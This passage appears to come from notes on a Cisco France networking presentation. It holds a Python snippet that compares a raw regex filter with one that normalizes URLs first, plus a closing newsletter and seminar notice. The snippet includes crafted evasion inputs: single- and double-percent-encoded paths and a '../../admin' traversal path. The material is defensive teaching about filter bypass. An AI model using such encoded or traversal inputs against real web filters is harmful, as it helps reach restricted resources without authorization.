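    """Run the same plain-ASCII regex on the raw path and on its canonical form,
    i.e. a filter without and with the 'Normalize' stage in front of it."""
    rx = re.compile(pattern)
    canon, passes = canonicalize_path(path)
    return {"canonical": canon, "decode_passes": passes,
            "raw_match": bool(rx.search(path)),
            "normalized_match": bool(rx.search(canon))}


# Constructed inputs modelled on the slides, not the deck's real URLs.
FIGURE_URL = "%2Fhomepage%2Findex%2Fpictures%2Fgog.html"
ENCODED_DATASHEET = "/%70%72%6F%64%75%63%74%73/%64%61%74%61%5F%73%68%65%65%74.html"
DOUBLE_ENCODED = "/products/%2564%2561%2574%2561_sheet.html"
TRAVERSAL = "/products/data_sheet/../../admin/index.html"

if __name__ == "__main__":
    for u in (FIGURE_URL, ENCODED_DATASHEET, DOUBLE_ENCODED, TRAVERSAL):
        print(u, "->", url_matches(u))
```

A raw regex misses the encoded spellings of data_sheet, while the canonical form matches; a rising decode_passes count is itself worth alerting on, since legitimate clients rarely send multiply-encoded paths.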


Q&A


 Find Cisco news every month in Cisco Mag, the Cisco France newsletter. Subscription: www.cisco.fr/go/ciscomag

 Solutions seminar: The Campus Network. Thursday 24 May 2007, morning, at the Institut Océanographique, Paris
